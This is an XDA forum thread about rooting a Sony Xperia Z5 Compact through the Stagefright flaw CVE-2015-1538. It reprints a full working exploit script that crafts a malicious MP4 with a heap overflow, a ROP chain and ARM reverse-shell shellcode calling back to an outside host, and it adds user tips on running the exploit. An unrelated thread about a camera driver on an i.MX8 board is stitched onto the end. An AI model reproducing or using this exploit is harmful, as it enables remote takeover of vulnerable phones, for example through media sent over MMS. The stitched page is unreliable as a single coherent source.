- Is the Sony Xperia Z5 compact vulnerable using the CVE-2015-1538 exploit? (haven#t tested yet on my Sony Xperia Z5 compact device)
Click to expand...
Click to collapse
Yes, according to Stagefright Detector. I could not get Stagefright to work on my Z5C, but that is probably due to my shortcomings.
klausstoertebeker said:
- Is it then possible to root the Sony Xperia Z5 compact permanently by changing the neccessary files in the System, maybe manually via telnet?
Click to expand...
Click to collapse
Probably not. Stagefright will give you "media" or "system" privileges. These users can't remount the system partition to make it writable. Also, Sony have strengthen the security using a kernel module (Sony RIC) that disallows any user (even root) to remount system partition.
However, you could maybe (very unlikely) find a system writable executable file in ramdisk and hope for root to execute your modified file.
klausstoertebeker said:
- Can this be done without unlocking the bootloader?
Click to expand...
Click to collapse
Afaik, no one have succeeded yet.
klausstoertebeker said:
- Which files have to be changed and what are the changes to get permanent root Access?
Maybe this is a way to backup the TA partition to preserve DRM keys if rooting is not possible with this method. And after backing up rooting could be done by unlocking the bootloader and then applying the root methods described in other threads.
Click to expand...
Click to collapse
Permanent root on this device is rather tough to achieve. You can't modify system partition due to dm-verity (verified boot), and you can most likely not modify boot partition without unlocking the bootloader.
As you say, your best shot is to achieve temporary root by exploiting some kernel module/driver and then dump TA. This is of course not trivial.
There is maybe another way to get both root and DRM features. As system user (achieved using Stagefright), you can query the "tad" socket to retrieve the DRM keys. This is how Sony is reading the DRM keys when verifying things. When you have the DRM keys you can unlock BL, root, and then modify your ROM to spoof "tad" socket responses with your previously extracted keys. Unlikely, but possibly, you could even write the keys back to the TA partition.
This method requires system privileges. If some clever one helps me getting Stagefright working, I could probably extract the DRM keys.
Maybe the CVE-2015-3636 is easier to use?
Hi nilezon!
Due to the fact I'm on vacation I can't try to get the CVE-2015-1538 exploit working - my SONY Xperia Z5 compact is at home
But I surfed the Internet and found another exploit that's maybe easier to be used to get root privileges: CVE-2015-3636
And if I get the document right, a non-privileged app could be used to get root privileges using a pointer use-after-free bug in the kernel. I'm not an app programmer (I just programmed aviation software parts for jet propulsed military planes ), but it seems to me that the way described in the linked document is easier to go than the way to use the CVE-2015-1538 - I read in the internet that Sony currently is delivering a patch closing the stagefright exploit.
To find out if my phone (SONY Xperia Z1 compact) and tablet are vulnerable to the CVE-2015-3636, I used the app VTS for Android.
If this is a walkable way and you could write an app, maybe the code for backing up the DRM keys or the whole TA Partition could be included into that app using the CVE-2015-3636 exploit to get even temporary root privileges...
What do you think?
Regards
"Klaus"
klausstoertebeker said:
...
Click to expand...
Click to collapse
AFAIK, the Z5 family is not vulnerable to the CVE-2015-3636 exploit.
Generating the CVE-1538-2015 mp4-file
Hi nilezon,
I was able to generate the CVE-1538-2015 file doing three modifications to the python code published by Joshua J. Drake:
Code:
#!/usr/bin/env python
# Joshua J. Drake (@jduck) of ZIMPERIUM zLabs
# Shout outs to our friends at Optiv (formerly Accuvant Labs)
# (C) Joshua J. Drake, ZIMPERIUM Inc, Mobile Threat Protection, 2015
# www.zimperium.com
#
# Exploit for RCE Vulnerability CVE-2015-1538 #1
# Integer Overflow in the libstagefright MP4 'stsc' atom handling
#
# Don't forget, the output of "create_mp4" can be delivered many ways!
# MMS is the most dangerous attack vector, but not the only one...
#
# DISCLAIMER: This exploit is for testing and educational purposes only. Any
# other usage for this code is not allowed. Use at your own risk.
#
# "With great power comes great responsibility." - Uncle Ben
#
import struct
import socket
#
# Creates a single MP4 atom - LEN, TAG, DATA
#
def make_chunk(tag, data):
if len(tag) != 4:
raise 'Yo! They call it "FourCC" for a reason.'
ret = struct.pack('>L', len(data) + 8)
ret += tag
ret += data
return ret
#
# Make an 'stco' atom - Sample Table Chunk Offets
#
def make_stco(extra=''):
ret = struct.pack('>L', 0) # version
ret += struct.pack('>L', 0) # mNumChunkOffsets
return make_chunk('stco', ret+extra)
#
# Make an 'stsz' atom - Sample Table Size
#
def make_stsz(extra=''):
ret = struct.pack('>L', 0) # version
ret += struct.pack('>L', 0) # mDefaultSampleSize
ret += struct.pack('>L', 0) # mNumSampleSizes
return make_chunk('stsz', ret+extra)
#
# Make an 'stts' atom - Sample Table Time-to-Sample
#
def make_stts():
ret = struct.pack('>L', 0) # version
ret += struct.pack('>L', 0) # mTimeToSampleCount
return make_chunk('stts', ret)
#
# This creates a single Sample Table Sample-to-Chunk entry
#
def make_stsc_entry(start, per, desc):
ret = ''
ret += struct.pack('>L', start + 1)
ret += struct.pack('>L', per)
ret += struct.pack('>L', desc)
return ret
#
# Make an 'stsc' chunk - Sample Table Sample-to-Chunk
#
# If the caller desires, we will attempt to trigger (CVE-2015-1538 #1) and
# cause a heap overflow.
#
# def make_stsc(num_alloc, num_write, sp_addr=0x42424242, do_overflow = False):
def make_stsc(num_alloc, num_write, sp_addr=0x42424242, do_overflow = True):
ret = struct.pack('>L', 0) # version/flags
# this is the clean version...
if not do_overflow:
ret += struct.pack('>L', num_alloc) # mNumSampleToChunkOffsets
ret += 'Z' * (12 * num_alloc)
return make_chunk('stsc', ret)
# now the explicit version. (trigger the bug)
ret += struct.pack('>L', 0xc0000000 + num_alloc) # mNumSampleToChunkOffsets
# fill in the entries that will overflow the buffer
for x in range(0, num_write):
ret += make_stsc_entry(sp_addr, sp_addr, sp_addr)
ret = make_chunk('stsc', ret)
# patch the data_size
ret = struct.pack('>L', 8 + 8 + (num_alloc * 12)) + ret[4:]
return ret
#
# Build the ROP chain
#
# ROP pivot by Georg Wicherski! Thanks!
#
"""
(gdb) x/10i __dl_restore_core_regs
0xb0002850 <__dl_restore_core_regs>: add r1, r0, #52 ; 0x34
0xb0002854 <__dl_restore_core_regs+4>: ldm r1, {r3, r4, r5}
0xb0002858 <__dl_restore_core_regs+8>: push {r3, r4, r5}
0xb000285c <__dl_restore_core_regs+12>: ldm r0, {r0, r1, r2, r3, r4, r5, r6, r7, r8, r9, r10, r11}
0xb0002860 <__dl_restore_core_regs+16>: ldm sp, {sp, lr, pc}
"""
"""
b0001144 <__dl_mprotect>:
b0001144: e92d0090 push {r4, r7}
b0001148: e3a0707d mov r7, #125 ; 0x7d
b000114c: ef000000 svc 0x00000000
b0001150: e8bd0090 pop {r4, r7}
b0001154: e1b00000 movs r0, r0
b0001158: 512fff1e bxpl lr
b000115c: ea0015cc b b0006894 <__dl_raise+0x10>
"""
def build_rop(off, sp_addr, newpc_val, cb_host, cb_port):
rop = ''
rop += struct.pack('<L', sp_addr + off + 0x10) # new sp
rop += struct.pack('<L', 0xb0002a98) # new lr - pop {pc}
rop += struct.pack('<L', 0xb00038b2+1) # new pc: pop {r0, r1, r2, r3, r4, pc}
rop += struct.pack('<L', sp_addr & 0xfffff000) # new r0 - base address (page aligned)
rop += struct.pack('<L', 0x1000) # new r1 - length
rop += struct.pack('<L', 7) # new r2 - protection
rop += struct.pack('<L', 0xd000d003) # new r3 - scratch
rop += struct.pack('<L', 0xd000d004) # new r4 - scratch
rop += struct.pack('<L', 0xb0001144) # new pc - _dl_mprotect
native_start = sp_addr + 0x80
rop += struct.pack('<L', native_start) # address of native payload
#rop += struct.pack('<L', 0xfeedfed5) # top of stack...
# linux/armle/shell_reverse_tcp (modified to pass env and fork/exit)
buf = ''
# fork
buf += '\x02\x70\xa0\xe3'
buf += '\x00\x00\x00\xef'
# continue if not parent...
buf += '\x00\x00\x50\xe3'
buf += '\x02\x00\x00\x0a'
# exit parent
buf += '\x00\x00\xa0\xe3'
buf += '\x01\x70\xa0\xe3'
buf += '\x00\x00\x00\xef'
# setsid in child
buf += '\x42\x70\xa0\xe3'
buf += '\x00\x00\x00\xef'
# socket/connect/dup2/dup2/dup2
buf += '\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x05\x20\x81\xe2\x8c'
buf += '\x70\xa0\xe3\x8d\x70\x87\xe2\x00\x00\x00\xef\x00\x60'
buf += '\xa0\xe1\x6c\x10\x8f\xe2\x10\x20\xa0\xe3\x8d\x70\xa0'
buf += '\xe3\x8e\x70\x87\xe2\x00\x00\x00\xef\x06\x00\xa0\xe1'
buf += '\x00\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00\x00\xef\x06'
buf += '\x00\xa0\xe1\x01\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00'
buf += '\x00\xef\x06\x00\xa0\xe1\x02\x10\xa0\xe3\x3f\x70\xa0'
buf += '\xe3\x00\x00\x00\xef'
# execve(shell, argv, env)
buf += '\x30\x00\x8f\xe2\x04\x40\x24\xe0'
buf += '\x10\x00\x2d\xe9\x38\x30\x8f\xe2\x08\x00\x2d\xe9\x0d'
buf += '\x20\xa0\xe1\x10\x00\x2d\xe9\x24\x40\x8f\xe2\x10\x00'
buf += '\x2d\xe9\x0d\x10\xa0\xe1\x0b\x70\xa0\xe3\x00\x00\x00'
buf += '\xef\x02\x00'
# Add the connect back host/port
buf += struct.pack('!H', cb_port)
cb_host = socket.inet_aton(cb_host)
buf += struct.pack('=4s', cb_host)
# shell -
buf += '/system/bin/sh\x00\x00'
# argv -
buf += 'sh\x00\x00'
# env -
buf += 'PATH=/sbin:/vendor/bin:/system/sbin:/system/bin:/system/xbin\x00'
# Add some identifiable stuff, just in case something goes awry...
rop_start_off = 0x34
x = rop_start_off + len(rop)
while len(rop) < 0x80 - rop_start_off:
rop += struct.pack('<L', 0xf0f00000+x)
x += 4
# Add the native payload...
rop += buf
return rop
#
# Build an mp4 that exploits CVE-2015-1538 #1
#
# We mimic meow.3gp here...
#
def create_mp4(sp_addr, newpc_val, cb_host, cb_port):
chunks = []
# Build the MP4 header...
ftyp = 'mp42'
ftyp += struct.pack('>L', 0)
ftyp += 'mp42'
ftyp += 'isom'
chunks.append(make_chunk('ftyp', ftyp))
# Note, this causes a few allocations...
moov_data = ''
moov_data += make_chunk('mvhd',
struct.pack('>LL', 0, 0x41414141) +
('B' * 0x5c) )
# Add a minimal, verified trak to satisfy mLastTrack being set
moov_data += make_chunk('trak',
make_chunk('stbl',
make_stsc(0x28, 0x28) +
make_stco() +
make_stsz() +
make_stts() ))
# Spray the heap using a large tx3g chunk (can contain binary data!)
"""
0x4007004e <_ZNK7android7RefBase9decStrongEPKv+2>: ldr r4, [r0, #4] ; load mRefs
0x40070050 <_ZNK7android7RefBase9decStrongEPKv+4>: mov r5, r0
0x40070052 <_ZNK7android7RefBase9decStrongEPKv+6>: mov r6, r1
0x40070054 <_ZNK7android7RefBase9decStrongEPKv+8>: mov r0, r4
0x40070056 <_ZNK7android7RefBase9decStrongEPKv+10>: blx 0x40069884 ; atomic_decrement
0x4007005a <_ZNK7android7RefBase9decStrongEPKv+14>: cmp r0, #1 ; must be 1
0x4007005c <_ZNK7android7RefBase9decStrongEPKv+16>: bne.n 0x40070076 <_ZNK7android7RefBase9decStrongEPKv+42>
0x4007005e <_ZNK7android7RefBase9decStrongEPKv+18>: ldr r0, [r4, #8] ; load refs->mBase
0x40070060 <_ZNK7android7RefBase9decStrongEPKv+20>: ldr r1, [r0, #0] ; load mBase._vptr
0x40070062 <_ZNK7android7RefBase9decStrongEPKv+22>: ldr r2, [r1, #12] ; load method address
0x40070064 <_ZNK7android7RefBase9decStrongEPKv+24>: mov r1, r6
0x40070066 <_ZNK7android7RefBase9decStrongEPKv+26>: blx r2 ; call it!
"""
page = ''
off = 0 # the offset to the next object
off += 8
page += struct.pack('<L', sp_addr + 8 + 16 + 8 + 12 - 28) # _vptr.RefBase (for when we smash mDataSource)
page += struct.pack('<L', sp_addr + off) # mRefs
off += 16
page += struct.pack('<L', 1) # mStrong
page += struct.pack('<L', 0xc0dedbad) # mWeak
page += struct.pack('<L', sp_addr + off) # mBase
page += struct.pack('<L', 16) # mFlags (dont set OBJECT_LIFETIME_MASK)
off += 8
page += struct.pack('<L', sp_addr + off) # the mBase _vptr.RefBase
page += struct.pack('<L', 0xf00dbabe) # mBase.mRefs (unused)
off += 16
page += struct.pack('<L', 0xc0de0000 + 0x00) # vtable entry 0
page += struct.pack('<L', 0xc0de0000 + 0x04) # vtable entry 4
page += struct.pack('<L', 0xc0de0000 + 0x08) # vtable entry 8
page += struct.pack('<L', newpc_val) # vtable entry 12
rop = build_rop(off, sp_addr, newpc_val, cb_host, cb_port)
x = len(page)
while len(page) < 4096:
page += struct.pack('<L', 0xf0f00000+x)
x += 4
off = 0x34
page = page[:off] + rop + page[off+len(rop):]
spray = page * (((2*1024*1024) / len(page)) - 20)
moov_data += make_chunk('tx3g', spray)
block = 'A' * 0x1c
bigger = 'B' * 0x40
udta = make_chunk('udta',
make_chunk('meta',
struct.pack('>L', 0) +
make_chunk('ilst',
make_chunk('cpil', make_chunk('data', struct.pack('>LL', 21, 0) + 'A')) +
make_chunk('trkn', make_chunk('data', struct.pack('>LL', 0, 0) + 'AAAABBBB')) +
make_chunk('disk', make_chunk('data', struct.pack('>LL', 0, 0) + 'AAAABB')) +
make_chunk('covr', make_chunk('data', struct.pack('>LL', 0, 0) + block)) * 32 +
make_chunk('\xa9alb', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
make_chunk('\xa9ART', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
make_chunk('aART', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
make_chunk('\xa9day', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
make_chunk('\xa9nam', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
make_chunk('\xa9wrt', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
make_chunk('gnre', make_chunk('data', struct.pack('>LL', 1, 0) + block)) +
make_chunk('covr', make_chunk('data', struct.pack('>LL', 0, 0) + block)) * 32 +
make_chunk('\xa9ART', make_chunk('data', struct.pack('>LL', 0, 0) + bigger)) +
make_chunk('\xa9wrt', make_chunk('data', struct.pack('>LL', 0, 0) + bigger)) +
make_chunk('\xa9day', make_chunk('data', struct.pack('>LL', 0, 0) + bigger)))
)
)
moov_data += udta
# Make the nasty trak
tkhd1 = ''.join([
'\x00', # version
'D' * 3, # padding
'E' * (5*4), # {c,m}time, id, ??, duration
'F' * 0x10, # ??
struct.pack('>LLLLLL',
0x10000, # a00
0, # a01
0, # dx
0, # a10
0x10000, # a11
0), # dy
'G' * 0x14
])
trak1 = ''
trak1 += make_chunk('tkhd', tkhd1)
mdhd1 = ''.join([
'\x00', # version
'D' * 0x17, # padding
])
mdia1 = ''
mdia1 += make_chunk('mdhd', mdhd1)
mdia1 += make_chunk('hdlr', 'F' * 0x3a)
dinf1 = ''
dinf1 += make_chunk('dref', 'H' * 0x14)
minf1 = ''
minf1 += make_chunk('smhd', 'G' * 0x08)
minf1 += make_chunk('dinf', dinf1)
# Build the nasty sample table to trigger the vulnerability here.
stbl1 = make_stsc(3, (0x1200 / 0xc) - 1, sp_addr, True) # TRIGGER
# Add the stbl to the minf chunk
minf1 += make_chunk('stbl', stbl1)
# Add the minf to the mdia chunk
mdia1 += make_chunk('minf', minf1)
# Add the mdia to the track
trak1 += make_chunk('mdia', mdia1)
# Add the nasty track to the moov data
moov_data += make_chunk('trak', trak1)
# Finalize the moov chunk
moov = make_chunk('moov', moov_data)
chunks.append(moov)
# Combine outer chunks together and voila.
data = ''.join(chunks)
return data
if __name__ == '__main__':
import sys
# import mp4
import argparse
def write_file(path, content):
with open(path, 'wb') as f:
f.write(content)
def addr(sval):
if sval.startswith('0x'):
return int(sval, 16)
return int(sval)
# The address of a fake StrongPointer object (sprayed)
sp_addr = 0x41d00010 # takju @ imm76i - 2MB (via hangouts)
# The address to of our ROP pivot
newpc_val = 0xb0002850 # point sp at __dl_restore_core_regs
# Allow the user to override parameters
parser = argparse.ArgumentParser()
parser.add_argument('-c', '--connectback-host', dest='cbhost', default='31.3.3.7')
parser.add_argument('-p', '--connectback-port', dest='cbport', type=int, default=12345)
parser.add_argument('-s', '--spray-address', dest='spray_addr', type=addr, default=None)
parser.add_argument('-r', '--rop-pivot', dest='rop_pivot', type=addr, default=None)
parser.add_argument('-o', '--output-file', dest='output_file', default='cve-2015-1538-1.mp4')
args = parser.parse_args()
if len(sys.argv) == 1:
parser.print_help()
sys.exit(-1)
if args.spray_addr == None:
args.spray_addr = sp_addr
if args.rop_pivot == None:
args.rop_pivot = newpc_val
# Build the MP4 file...
# data = mp4.create_mp4(args.spray_addr, args.rop_pivot, args.cbhost, args.cbport)
data = create_mp4(args.spray_addr, args.rop_pivot, args.cbhost, args.cbport)
print('[*] Saving crafted MP4 to %s ...' % args.output_file)
write_file(args.output_file, data)
(Modifications are: changing line 77 from "def make_stsc(num_alloc, num_write, sp_addr=0x42424242, do_overflow = False)" to "def make_stsc(num_alloc, num_write, sp_addr=0x42424242, do_overflow = True)" to achive using the exploit, commenting out "import mp4" in line 353 to avoid compiler errors and changing line 390 from "data = mp4.create_mp4(args.spray_addr, args.rop_pivot, args.cbhost, args.cbport)" to "data = create_mp4(args.spray_addr, args.rop_pivot, args.cbhost, args.cbport)" to avoid compiler errors.
To run the code I used the "Wing IDE" in combination with "Python 2.7.3". I used the -c <reconnect-IP-address> and -p <reconnect-port> arguments.
But I can't get reconnected from my Sony Xperia Z5 compact because I don't know how to backlisten to the phone and switch to a shell. Maybe the computer in the Zimperium video shows a Linux machine and I'm just running a Windows 7 machine.
But maybe it helps you on the way to save the DRM keys.
(By the way: In the video the "id" command after the first changing directory shows "uid=0(root)" and "gid=0(root)" which means to me that the user has root privileges. Or I'm wrong?)
"Klaus"
But the z3+ old firmware is vulnerable. Maybe You can use a z3+ system folder on z5! They are quite same!
Sent from my E6533 using XDA Free mobile app
Good job on modifying the script. I could run it on my linux box without any modifications and it produced an MP4. I then moved it over to my Z5C and launched it. After that I tried a reverse shell (netcat -l -p <port>) but got nothing. Then I went out on the interwebs to investigate and here are a couple of pointers.
1. The code is written to exploit the hangouts app specifically. So running the mp4 with any other player isn't going to work.
2. The code is written to take default values if -s and -r are not given to the scripts as arguments. The default values are said to only work on the Nexus device that it was written for.
3. The video you saw was edited to make it look really simple, or another script was run that they didn't show us.
More information can be found in the comments around here:
http://null-byte.wonderhowto.com/forum/stagefright-exploit-released-0164432/
Happy exploiting, Merry Christmas.
~Aeny
Hey @klausstoertebeker I have an un rooted stock Sony Z5 Compact that can be used for exploit testing. Wanted to offer it for this purpose before rooting it. If having someone volunteer their "un rooted, bootloader never unlocked-phone" as a test device is helpful then let me know.
Otherwise Im going to root my new phone soon.
Keep up the good work!
Using "Stagefright" exploit CVE-2015-1538 for rooting Sony Xperia Z5 compact?
Hello Joeisgood99!
Thanks for your offer, but I'm not a programmer who takes part in rooting the Z5 compact actively 'cause I'm not experienced with Android programming at all. But I tried to give a thought how a root to this excellent mobile phone could be achieved.
For me using this exploit has become obselete 'cause I accidently did a System update where all the stagefright exploits are closed...
Regards
"Klaus"
You can downgrade your phone using the flashtools to a previous Android version. Dont give up!!!!
Sent from my E6533 using XDA Free mobile app
Maybe downgrade,...
... but to flash firmware you have to unlock the bootloader. And when unlocking the bootloader, you'll loose your DRM-keys.
And the intention to most "rooting" forums is to find a way rooting the mobile phone without unlocking the bootloader to keep the DRM-keys.
And, by the way, if you're unlocking your bootloader you can install a pre-rooted ROM instead of downloading stock ROM's.
You don't need to unlock bootloader to flash an official firmware.
klausstoertebeker said:
... but to flash firmware you have to unlock the bootloader. And when unlocking the bootloader, you'll loose your DRM-keys.
And the intention to most "rooting" forums is to find a way rooting the mobile phone without unlocking the bootloader to keep the DRM-keys.
And, by the way, if you're unlocking your bootloader you can install a pre-rooted ROM instead of downloading stock ROM's.
Click to expand...
Click to collapse
You can flash FTFs without any need of unlocking a Bootloader. And while you're at it: use 32.0.A.4.11 Literally everything exept CVE-2015-3876 is vunerable. I just bought a Z5, and looking forward to put some effort into messing with Stagefright rooting
I'm having a Z5 E6653 BTW
Sorry,...
... Myself5!
You're right saying that TFT's can be flashed without unlocking the bootloader. But nevertheless I won't downgrade again in the moment.
The reason for me to root my Z5 compact is that I'd like to install Xposed in combination with XPrivacy for security reasons. I want to controll the access of app to my personal data (contacts, calendar, location, etc). But now I found two apps which fulfil my security needs without root privileges:
MoboClean which is relased as working app
SRT AppGuard which is in beta stadium
I prefer the second solution, but in the moment it is still under development. I used it with KitKat and JellyBean and it was really good. And until it will be released as "productive" app I'll use MoboClean.
And the second reason for rooting my Z5 compact was that I want to deinstall those Google apps (and other pre-installed bloatware) which collect my data and "phone home" without my notice. And this can be done without rooting now on the Z5 compact via "Preferences -> Apps", selecting "Deactivate" in the appropriate app tab.
There is a number of stage fright vulnerabilitys in some of the stock firmware releases downloadable on Xperifirm. I have made screen shots and posted onbthis thread.
http://forum.xda-developers.com/showpost.php?p=64618471&postcount=93
pardon me,but i was just thinking..
https://www.nccgroup.trust/globalas...pers/2016/01/libstagefright-exploit-notespdf/
Here there are some steps/tips on how to deal with SELinux policy in order to use stagefright exploits successfully. Expert-oriented information
@zxz0O0 sorry to disturb you, don't know if you already know those things but i thought it's worth a check
Hi all,
I try to enable ov9734 sensor to board IMX8 in 64bits (Compulab board). I re-use a existing driver (ov5640) and I just modify registers and driver ID.
I modify device tree also.
My driver is found by kernel, no problem during probe.
But when I do "v4l2-ctl --all" command, the pixel format is null (or empty):
Code:
[email protected]:~# v4l2-ctl --all
Driver Info (not using libv4l2):
Driver name : mx6s-csi
Card type : i.MX6S_CSI
Bus info : platform:30a90000.csi1_bridge
Driver version: 4.9.51
Capabilities : 0x84200001
Video Capture
Streaming
Extended Pix Format
Device Capabilities
Device Caps : 0x04200001
Video Capture
Streaming
Extended Pix Format
Priority: 0
Video input : 0 (Camera: ok)
Format Video Capture:
Width/Height : 640/480
Pixel Format : ''
Field : None
Bytes per Line : 0
Size Image : 307200
Colorspace : Default
Transfer Function : Default
YCbCr Encoding : Default
Quantization : Default
And other problem (same problem ?) when I want start a streaming, I get nothing (no data send by mipi):
Code:
Input #0, video4linux2,v4l2, from '/dev/video0':
Duration: N/A, bitrate: 147456 kb/s
Stream #0:0: Video: rawvideo (YUY2 / 0x32595559), yuyv422, 640x480, 147456 kb/s, 30 fps, 30 tbr, 1000k tbn, 1000k tbc
[swscaler @ 0x4706ad0] deprecated pixel format used, make sure you did set range correctly
[image2 @ 0x46fe2b0] Using AVStream.codec to pass codec parameters to muxers is deprecated, use AVStream.codecpar instead.
Output #0, image2, to './out.jpg':
Metadata:
encoder : Lavf57.41.100
Stream #0:0: Video: mjpeg, yuvj422p(pc), 640x480, q=2-31, 200 kb/s, 30 fps, 30 tbn, 30 tbc
Metadata:
encoder : Lavc57.48.101 mjpeg
Side data:
cpb: bitrate max/min/avg: 0/0/200000 buffer size: 0 vbv_delay: -1
Stream mapping:
Stream #0:0 -> #0:0 (rawvideo (native) -> mjpeg (native))
Press [q] to stop, [?] for help
frame= 0 fps=0.0 q=0.0 Lsize=N/A time=00:00:00.00 bitrate=N/A speed= 0x
video:0kB audio:0kB subtitle:0kB other streams:0kB global headers:0kB muxing overhead: unknown
Output file is empty, nothing was encoded (check -ss / -t / -frames parameters if used)
Somebody can help me ?
Michaël